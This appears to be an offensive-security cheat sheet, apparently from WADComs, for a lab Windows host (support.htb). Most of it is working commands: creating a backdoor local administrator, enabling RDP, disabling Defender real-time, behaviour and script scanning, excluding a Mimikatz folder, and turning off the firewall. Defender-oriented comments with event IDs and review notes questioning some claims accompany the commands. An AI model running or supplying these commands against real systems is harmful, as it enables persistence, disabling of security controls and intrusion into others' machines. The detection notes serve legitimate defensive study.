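# Lab example (target support.htb): create a local account, then add it to the
# "Remote Desktop Users" and "Administrators" groups. Run on the Windows host
# from an elevated prompt.
# Defender view: with account-management auditing enabled, the account creation
# is logged as Security event 4720 and each group addition as 4732. Alert on
# new members of "Administrators" and "Remote Desktop Users", and review
# 4624 logons of type 10 (RemoteInteractive) for accounts created shortly before.
net user asuka 'TrYh@rdeR!' /add
net localgroup "Remote Desktop Users" asuka /add
net localgroup "Administrators" asuka /add

# Then access with xfreerdp (runs on the client, not on the Windows host).
# /cert:ignore skips server-certificate validation, and /p: leaves the password
# in the client's process list and shell history; keep both to lab use.
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb \
  /u:asuka /p:'TrYh@rdeR!' +nego

# or using rdesktop
rdesktop support.htb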
Enable RDP Access
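# Allow inbound Remote Desktop: set fDenyTSConnections to 0 and enable the
# built-in "Remote Desktop" firewall rule group. Needs administrative rights.
# Defender view: monitor writes to this value (Sysmon event 13, or Security
# event 4657 when registry auditing covers the key) and changes to the Remote
# Desktop firewall rules. Where RDP is not required, enforce the setting by
# Group Policy so a local change is reverted at the next policy refresh.
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

# In case PowerShell is not available (e.g. on an old machine)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes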
Disable Defender Feature
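# Query Microsoft Defender status, then switch off individual protections and
# add exclusions. Needs administrative rights.
# Defender view: with Tamper Protection enabled, protection settings changed
# this way are expected to be blocked or ignored. Configuration changes are
# recorded in the "Microsoft-Windows-Windows Defender/Operational" log
# (5001: real-time protection disabled, 5007: configuration changed). Alert on
# both, and on any new extension or path exclusion.
Get-MpComputerStatus
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -ExclusionExtension "ps1"
Set-MPPreference -DisableBehaviorMonitoring $true

# Disable AMSI (set to 0 to enable)
# NOTE(review): this parameter controls Defender's script scanning; the
# "AMSI" label is the page's own wording - confirm before relying on it.
Set-MpPreference -DisableScriptScanning 1

# Add folder exclusion (in case tamper protection is enabled)
Add-MpPreference -ExclusionPath C:\Mimikatz\

# Check all exclusion folders
Get-MpPreference | Select-Object -Property ExclusionPath -ExpandProperty ExclusionPath

# Disable Real Time Protection
# The first command deletes the whole Defender policy key, so any policy
# values set under it are removed as well.
# NOTE(review): Microsoft documents DisableAntiSpyware as a legacy value that
# current client builds ignore - verify the effect on the target OS version.
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f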
Turn Off Firewall
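# Turn off Windows Firewall for the Domain, Public and Private profiles.
# Needs administrative rights.
# Defender view: a profile state change is logged as event 2003 in the
# "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall" log
# (and as Security event 4950 when the matching audit subcategory is on).
# Enforcing the firewall state by Group Policy restores it at the next refresh.
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

# or
netsh advfirewall set allprofiles state off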
Get-ClipboardContents
Monitors the clipboard on a specified interval for changes to copied text.
WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.